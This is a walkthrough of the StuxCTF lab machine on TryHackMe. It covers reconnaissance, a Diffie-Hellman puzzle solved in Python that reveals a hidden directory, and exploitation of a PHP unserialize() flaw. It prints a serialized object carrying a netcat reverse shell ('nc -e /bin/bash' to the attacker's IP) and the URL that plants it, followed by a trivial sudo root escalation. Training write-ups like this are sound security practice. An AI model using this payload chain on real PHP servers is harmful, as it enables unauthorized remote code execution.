StuxCTF - Writeup
A walkthrough of the StuxCTF room - exclusively available on TryHackMe. Deploy in the cloud and access via OpenVPN. Get hacking!

This was a great CTF machine for beginners, but somehow it had very few solves, probably because of the very first task, which is finding a directory by solving a Diffie-Hellman challenge. Without any further spoilers, let's get started.
Note
This machine is only available on TryHackMe. You can deploy the machine in the cloud, access it via OpenVPN and hack it right away! So sign in and follow along with me!
Nmap
Let's do some basic reconnaissance, starting with an nmap scan (nmap -sV -sC -A 10.0.0.6), which reveals the following:-
Host is up (0.27s latency).
Not shown: 974 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 e8:da:b7:0d:a7:a1:cc:8e:ac:4b:19:6d:25:2b:3e:77 (RSA)
| 256 c1:0c:5a:db:6c:d6:a3:15:96:85:21:e9:48:65:28:42 (ECDSA)
|_ 256 0f:1a:6a:d1:bb:cb:a6:3e:bd:8f:99:8d:da:2f:30:86 (EdDSA)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/StuxCTF/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Default Page
So, we have an Apache web server on port 80 and SSH on its default port 22. Let's move further.
HTTP Enumeration and The Hidden Directory
Heading over to the web server gives a pretty blank website, so I inspected the source code, which had the following data:-
<html>
<head>
<title>Default Page</title>
</head>
<body>
<!-- The secret directory is...
p: 9975298661930085086019708402870402191114171745913160469454315876556947370642799226714405016920875594030192024506376929926694545081888689821796050434591251;
g: 7;
a: 330;
b: 450;
g^c: 6091917800833598741530924081762225477418277010142022622731688158297759621329407070985497917078988781448889947074350694220209769840915705739528359582454617;
-->
is blank....
</body>
</html>
The commented-out data somehow encodes the hidden directory we want to access. Checking robots.txt shows one disallowed entry; let's check it out.
# robots.txt generated by StuxCTF
# Diffie-Hellman
User-agent: *
Disallow:
Disallow: /StuxCTF/
We can see a disallowed entry for /StuxCTF/, which could possibly be a hint. Browsing to it gives nothing useful (we would need a file name or some other route into /StuxCTF), so we are at a dead end there; but we do have a secret directory whose name is hidden behind the Diffie-Hellman parameters. Let's try to recover it.
Solving the Diffie-Hellman Challenge
From robots.txt we can see that it says "Diffie-Hellman", which most probably refers to the data we found earlier. Searching for a script or the algorithm, I found a challenge with similar variables and used that blog as a reference to solve it (blog that helped me).
Using the following script we can get the hidden directory:-
#!/usr/bin/python3
# Parameters taken from the HTML comment on the default page.
p = 9975298661930085086019708402870402191114171745913160469454315876556947370642799226714405016920875594030192024506376929926694545081888689821796050434591251
g = 7
a = 330
b = 450
gc = 6091917800833598741530924081762225477418277010142022622731688158297759621329407070985497917078988781448889947074350694220209769840915705739528359582454617  # g^c mod p
# pow(base, exp, mod) does modular exponentiation without building the huge
# intermediate that (gc ** a) % p would create.
gca = pow(gc, a, p)     # (g^c)^a = g^(ca) mod p
gcab = pow(gca, b, p)   # (g^(ca))^b = g^(cab) mod p, the three-party shared secret
print(str(gcab)[:128])  # the first 128 digits are the hidden directory name
#47315028937264895539131328176684350732577039984023005189203993885687328953804202704977050807800832928198526567069446044422855055
Running the above script we will get the hidden directory.
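What the script above actually computes is a three-party Diffie-Hellman shared secret, g^(abc) mod p: each party only ever receives another party's public value and raises it by its own exponent. The following is an added example, not code from the original writeup, that packages that derivation as functions and checks the three-party property with a made-up c (the room never reveals c, only g^c); the constants are the page's, the function names are mine.

```python
# Added example, not part of the original writeup: the three-party Diffie-Hellman
# derivation behind the hidden directory name, written as reusable functions.
from typing import Iterable, Tuple

# Parameters published in the HTML comment on the default page.
P = 9975298661930085086019708402870402191114171745913160469454315876556947370642799226714405016920875594030192024506376929926694545081888689821796050434591251
G = 7
A = 330
B = 450
G_C = 6091917800833598741530924081762225477418277010142022622731688158297759621329407070985497917078988781448889947074350694220209769840915705739528359582454617


def raise_by(p: int, received: int, exponents: Iterable[int]) -> int:
    """Raise a received public value by each secret exponent this side holds.

    pow(base, exp, mod) reduces after every squaring, so intermediates never grow
    beyond p; (g_c ** a) % p would first build an integer of roughly 170 kbit.
    """
    value = received
    for e in exponents:
        value = pow(value, e, p)
    return value


def directory_name(p: int, a: int, b: int, g_c: int, digits: int = 128) -> str:
    """The room's convention: the hidden directory is the first 128 decimal digits
    of g^(abc) mod p, derived from the published g^c and the exponents a and b."""
    return str(raise_by(p, g_c, (a, b)))[:digits]


def three_party_views(p: int, g: int, a: int, b: int, c: int) -> Tuple[int, int, int]:
    """Every party ends with g^(abc) mod p although none of them sees another
    party's exponent: a party only receives g^(xy) and raises it by its own secret.
    c is unknown for the room (only g^c is published), so the caller supplies a
    hypothetical one to exercise this.
    """
    g_a, g_b, g_c = pow(g, a, p), pow(g, b, p), pow(g, c, p)
    view_a = raise_by(p, pow(g_b, c, p), (a,))  # A receives g^(bc) from C
    view_b = raise_by(p, pow(g_c, a, p), (b,))  # B receives g^(ca) from A
    view_c = raise_by(p, pow(g_a, b, p), (c,))  # C receives g^(ab) from B
    return view_a, view_b, view_c


if __name__ == "__main__":
    print(directory_name(P, A, B, G_C))
    # Sanity check with a made-up c (hypothetical; the real c is never revealed).
    views = three_party_views(P, G, A, B, 123457)
    assert len(set(views)) == 1
```

Nothing here is "decryption": the room hands over a and b in the clear, so the shared secret falls out of two modular exponentiations. In a real exchange only g^a, g^b and g^c are visible, and recovering the secret would mean solving a discrete logarithm in a 512-bit prime field, which is exactly the problem Diffie-Hellman relies on being hard.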
Reverse Shell via PHP's Unserialize Object
Moving over to that page, we see a page that just says "Follow the white rabbit..". Inspecting the page source gives the following data, which contains a very interesting hint:-
</nav>
<!-- hint: /?file= -->
<div class="container">
<div class="jumbotron">
<center>
<h1>Follow the white rabbit..</h1>
</center>
</div>
</div>
At first it seemed like an LFI challenge, but it wasn't. I tried accessing files like /etc/passwd and others, but all failed. At last, I tried to access index.php itself, which gives a very long hex encoded string.
Converting the hex to ASCII gives the content of index.php as a reversed base64 string (the "==" padding sits at the start of the string instead of the end). Reversing the string and base64-decoding it gives the source:-
Decoding the above gives the following (the nl2br() call in the code appends a <br /> to every line of the output; those are omitted here):-
error_reporting(0);
class file {
public $file = "dump.txt";
public $data = "dump test";
function __destruct(){
file_put_contents($this->file, $this->data);
}
}

$file_name = $_GET['file'];
if(isset($file_name) && !file_exists($file_name)){
echo "File no Exist!";
}

if($file_name=="index.php"){
$content = file_get_contents($file_name);
$tags = array("", "");
echo bin2hex(strrev(base64_encode(nl2br(str_replace($tags, "", $content)))));
}
unserialize(file_get_contents($file_name));

<!DOCTYPE html>
<head>
<title>StuxCTF</title>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" href="assets/css/bootstrap.min.css" />
<link rel="stylesheet" href="assets/css/style.css" />
</head>
<body>
<nav class="navbar navbar-default navbar-fixed-top">
<div class="container">
<div class="navbar-header">
<button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#navbar" aria-expanded="false" aria-controls="navbar">
<span class="sr-only">Toggle navigation</span>
</button>
<a class="navbar-brand" href="index.php">Home</a>
</div>
</div>
</nav>
<!-- hint: /?file= -->
<div class="container">
<div class="jumbotron">
<center>
<h1>Follow the white rabbit..</h1>
</center>
</div>
</div>
<script src="assets/js/jquery-1.11.3.min.js"></script>
<script src="assets/js/bootstrap.min.js"></script>
</body>
</html>
I've never done any challenge like this, and it was the reason I loved this machine so much; it pushed me to the limit. I tried every resource available to me, but somehow I was way too clueless and far from getting this exploited. After some time, I contacted Stuxnet and he told me to check this to move on. After a lot more research (and a very long conversation with the author), I figured out the following way to get a shell.
At first, I created a serialized object with the following PHP code:-
<?php
class file
{
public $file = 'n.php';
public $data = '<?php shell_exec("nc -e /bin/bash 10.8.1.184 1234"); ?>';
}
echo (serialize(new file));
?>
Remember to use your tun0 IP for the reverse shell!
$ gedit new.php
$ php new.php > shell.txt
$ cat shell.txt
O:4:"file":2:{s:4:"file";s:5:"n.php";s:4:"data";s:55:"<?php shell_exec("nc -e /bin/bash 10.8.1.184 1234"); ?>";}
Now, the author of the machine told me that allow_url_fopen is enabled, which means file_get_contents() in /?file= will fetch a remote URL, so we can feed it our shell.txt. Note that the file_exists() check only prints "File no Exist!" for a URL (the http:// wrapper does not support it); it does not stop the script, and unserialize(file_get_contents($file_name)) still runs. So we serve shell.txt from a local HTTP server with python -m SimpleHTTPServer 1337 and request the URL below: unserialize() rebuilds our file object, and when that object is destroyed at the end of the request, __destruct() calls file_put_contents() and creates n.php with <?php shell_exec("nc -e /bin/bash 10.8.1.184 1234"); ?> as its content.
Going to the following URL will create n.php with the help of shell.txt:-
http://10.0.0.6/47315028937264895539131328176684350732577039984023005189203993885687328953804202704977050807800832928198526567069446044422855055/?file=http://10.8.1.184:1337/shell.txt
After this we set up a listener (nc -lvnp 1234) and visited 10.0.0.6/47315028937264895539131328176684350732577039984023005189203993885687328953804202704977050807800832928198526567069446044422855055/n.php, and we got a shell.
Root
This disappointed me a little, because I thought it would be something like spoofing SUID binaries to get a shell or something similar. The root was easier, way easier. I first tried to check grecia/.bash_history, but got permission denied. So I tried the very basic sudo su, which to my surprise gave a root shell!